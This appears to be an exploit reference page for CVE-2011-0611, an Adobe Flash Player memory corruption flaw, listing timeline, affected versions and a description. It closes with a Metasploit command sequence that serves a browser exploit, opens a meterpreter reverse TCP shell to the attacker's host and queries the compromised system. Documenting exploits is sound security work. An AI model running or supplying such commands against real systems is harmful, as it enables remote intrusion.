CVE-2011-0611 : Adobe Flash Player SWF Memory Corruption Vulnerability

Timeline :

Vulnerability discovered exploited in the wild
First information about the 0day published the 2011-04-11
Security Advisory APSA11-02 posted by the vendor the 2011-04-11
First vulnerability analysis provided the 2011-04-11
Vendor update provided the 2011-04-15
Metasploit PoC provided by sinn3r the 2011-04-15

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2011-0611
APSA11-02
OSVDB-71686

Affected version(s) :

Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.25 and earlier for Chrome users
Adobe Flash Player 10.2.156.12 and earlier versions for Android
Adobe AIR 2.6.19120 and earlier versions for Windows, Macintosh and Linux

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Adobe Flash Player 10.2.153.1

Description :

This module exploits a vulnerability in Adobe Flash Player that was discovered, and has been exploited actively in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory, and results arbitrary code execution.

Commands :

use exploit/windows/browser/adobe_flashplayer_flash10o
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid